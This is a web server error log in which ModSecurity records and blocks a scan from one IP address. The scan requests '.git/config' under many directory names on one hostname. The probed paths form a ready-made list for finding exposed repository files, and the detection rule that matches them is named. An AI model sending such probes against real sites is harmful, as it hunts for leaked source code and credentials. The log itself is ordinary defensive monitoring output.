[Thu May 23 21:50:57.950983 2024] [:error] [pid 3413215] [client 104.234.204.32:45446] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/css/.git/config"] [unique_id "Zk-eIcTZAE7eF0447XNsugAAAAU"]
[Thu May 23 21:50:57.958793 2024] [:error] [pid 3414863] [client 104.234.204.32:45462] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /core/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/core/.git/config"] [unique_id "Zk-eIblcUE7FzAkWB0OTrQAAAAc"]
[Thu May 23 21:50:57.959182 2024] [:error] [pid 3414863] [client 104.234.204.32:45462] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/core/.git/config"] [unique_id "Zk-eIblcUE7FzAkWB0OTrQAAAAc"]
[Thu May 23 21:50:57.959533 2024] [:error] [pid 3414863] [client 104.234.204.32:45462] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/core/.git/config"] [unique_id "Zk-eIblcUE7FzAkWB0OTrQAAAAc"]
[Thu May 23 21:50:58.016789 2024] [:error] [pid 3413213] [client 104.234.204.32:45494] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /demo/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/demo/.git/config"] [unique_id "Zk-eIkRtqfe68Tkm9lTpsgAAAAM"]
[Thu May 23 21:50:58.017291 2024] [:error] [pid 3413213] [client 104.234.204.32:45494] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/demo/.git/config"] [unique_id "Zk-eIkRtqfe68Tkm9lTpsgAAAAM"]
[Thu May 23 21:50:58.017727 2024] [:error] [pid 3413213] [client 104.234.204.32:45494] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/demo/.git/config"] [unique_id "Zk-eIkRtqfe68Tkm9lTpsgAAAAM"]
[Thu May 23 21:50:58.050688 2024] [:error] [pid 3413210] [client 104.234.204.32:45478] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /database/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/database/.git/config"] [unique_id "Zk-eImikoYj9w0kALAhtRQAAAAA"]
[Thu May 23 21:50:58.051254 2024] [:error] [pid 3413210] [client 104.234.204.32:45478] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/database/.git/config"] [unique_id "Zk-eImikoYj9w0kALAhtRQAAAAA"]
[Thu May 23 21:50:58.051641 2024] [:error] [pid 3413210] [client 104.234.204.32:45478] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/database/.git/config"] [unique_id "Zk-eImikoYj9w0kALAhtRQAAAAA"]
[Thu May 23 21:50:58.133254 2024] [:error] [pid 3413433] [client 104.234.204.32:45470] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /data/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/data/.git/config"] [unique_id "Zk-eIjaPQQ881d8bAu5nQwAAAAY"]
[Thu May 23 21:50:58.133889 2024] [:error] [pid 3413433] [client 104.234.204.32:45470] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/data/.git/config"] [unique_id "Zk-eIjaPQQ881d8bAu5nQwAAAAY"]
[Thu May 23 21:50:58.134294 2024] [:error] [pid 3413433] [client 104.234.204.32:45470] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/data/.git/config"] [unique_id "Zk-eIjaPQQ881d8bAu5nQwAAAAY"]
[Thu May 23 21:50:58.134687 2024] [:error] [pid 3413211] [client 104.234.204.32:45510] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /developer/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/developer/.git/config"] [unique_id "Zk-eIvWGyBPySR9VLpy1kwAAAAE"]
[Thu May 23 21:50:58.135347 2024] [:error] [pid 3413211] [client 104.234.204.32:45510] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/developer/.git/config"] [unique_id "Zk-eIvWGyBPySR9VLpy1kwAAAAE"]
[Thu May 23 21:50:58.135765 2024] [:error] [pid 3413211] [client 104.234.204.32:45510] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/developer/.git/config"] [unique_id "Zk-eIvWGyBPySR9VLpy1kwAAAAE"]
[Thu May 23 21:50:58.163273 2024] [:error] [pid 3431457] [client 104.234.204.32:45520] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /doc/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/doc/.git/config"] [unique_id "Zk-eIsDLXjxS3Q8qbGS2kAAAAAk"]
[Thu May 23 21:50:58.163827 2024] [:error] [pid 3431457] [client 104.234.204.32:45520] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/doc/.git/config"] [unique_id "Zk-eIsDLXjxS3Q8qbGS2kAAAAAk"]
[Thu May 23 21:50:58.164220 2024] [:error] [pid 3431457] [client 104.234.204.32:45520] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/doc/.git/config"] [unique_id "Zk-eIsDLXjxS3Q8qbGS2kAAAAAk"]
[Thu May 23 21:50:58.166338 2024] [authz_core:error] [pid 3414898] [client 104.234.204.32:45496] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/dev/.git
[Thu May 23 21:50:58.169377 2024] [:error] [pid 3413215] [client 104.234.204.32:45546] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /downloads/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/downloads/.git/config"] [unique_id "Zk-eIsTZAE7eF0447XNsuwAAAAU"]
[Thu May 23 21:50:58.169796 2024] [:error] [pid 3413215] [client 104.234.204.32:45546] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/downloads/.git/config"] [unique_id "Zk-eIsTZAE7eF0447XNsuwAAAAU"]
[Thu May 23 21:50:58.170125 2024] [:error] [pid 3413215] [client 104.234.204.32:45546] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/downloads/.git/config"] [unique_id "Zk-eIsTZAE7eF0447XNsuwAAAAU"]
[Thu May 23 21:50:58.172281 2024] [:error] [pid 3413214] [client 104.234.204.32:45518] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /dist/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/dist/.git/config"] [unique_id "Zk-eIpzctTAUN3VLWY6UFgAAAAQ"]
[Thu May 23 21:50:58.172710 2024] [:error] [pid 3413214] [client 104.234.204.32:45518] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/dist/.git/config"] [unique_id "Zk-eIpzctTAUN3VLWY6UFgAAAAQ"]
[Thu May 23 21:50:58.173051 2024] [:error] [pid 3413214] [client 104.234.204.32:45518] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/dist/.git/config"] [unique_id "Zk-eIpzctTAUN3VLWY6UFgAAAAQ"]
[Thu May 23 21:50:58.175951 2024] [:error] [pid 3414863] [client 104.234.204.32:45552] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /files/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/files/.git/config"] [unique_id "Zk-eIrlcUE7FzAkWB0OTrgAAAAc"]
[Thu May 23 21:50:58.176361 2024] [:error] [pid 3414863] [client 104.234.204.32:45552] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/files/.git/config"] [unique_id "Zk-eIrlcUE7FzAkWB0OTrgAAAAc"]
[Thu May 23 21:50:58.176499 2024] [:error] [pid 3414863] [client 104.234.204.32:45552] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/files/.git/config"] [unique_id "Zk-eIrlcUE7FzAkWB0OTrgAAAAc"]
[Thu May 23 21:50:58.241099 2024] [:error] [pid 3413213] [client 104.234.204.32:45560] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /flock/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/flock/.git/config"] [unique_id "Zk-eIkRtqfe68Tkm9lTpswAAAAM"]
[Thu May 23 21:50:58.241753 2024] [:error] [pid 3413213] [client 104.234.204.32:45560] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/flock/.git/config"] [unique_id "Zk-eIkRtqfe68Tkm9lTpswAAAAM"]
[Thu May 23 21:50:58.242297 2024] [:error] [pid 3413213] [client 104.234.204.32:45560] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/flock/.git/config"] [unique_id "Zk-eIkRtqfe68Tkm9lTpswAAAAM"]
[Thu May 23 21:50:58.278415 2024] [:error] [pid 3413210] [client 104.234.204.32:45576] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /git/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/git/.git/config"] [unique_id "Zk-eImikoYj9w0kALAhtRgAAAAA"]
[Thu May 23 21:50:58.279021 2024] [:error] [pid 3413210] [client 104.234.204.32:45576] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/git/.git/config"] [unique_id "Zk-eImikoYj9w0kALAhtRgAAAAA"]
[Thu May 23 21:50:58.279583 2024] [:error] [pid 3413210] [client 104.234.204.32:45576] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/git/.git/config"] [unique_id "Zk-eImikoYj9w0kALAhtRgAAAAA"]
[Thu May 23 21:50:58.359549 2024] [:error] [pid 3413433] [client 104.234.204.32:45578] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /htdocs/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/htdocs/.git/config"] [unique_id "Zk-eIjaPQQ881d8bAu5nRAAAAAY"]
[Thu May 23 21:50:58.360105 2024] [:error] [pid 3413433] [client 104.234.204.32:45578] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/htdocs/.git/config"] [unique_id "Zk-eIjaPQQ881d8bAu5nRAAAAAY"]
[Thu May 23 21:50:58.360586 2024] [:error] [pid 3413433] [client 104.234.204.32:45578] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/htdocs/.git/config"] [unique_id "Zk-eIjaPQQ881d8bAu5nRAAAAAY"]
[Thu May 23 21:50:58.360648 2024] [:error] [pid 3413211] [client 104.234.204.32:45580] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /html/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/html/.git/config"] [unique_id "Zk-eIvWGyBPySR9VLpy1lAAAAAE"]
[Thu May 23 21:50:58.361192 2024] [:error] [pid 3413211] [client 104.234.204.32:45580] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/html/.git/config"] [unique_id "Zk-eIvWGyBPySR9VLpy1lAAAAAE"]
[Thu May 23 21:50:58.361633 2024] [:error] [pid 3413211] [client 104.234.204.32:45580] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/html/.git/config"] [unique_id "Zk-eIvWGyBPySR9VLpy1lAAAAAE"]
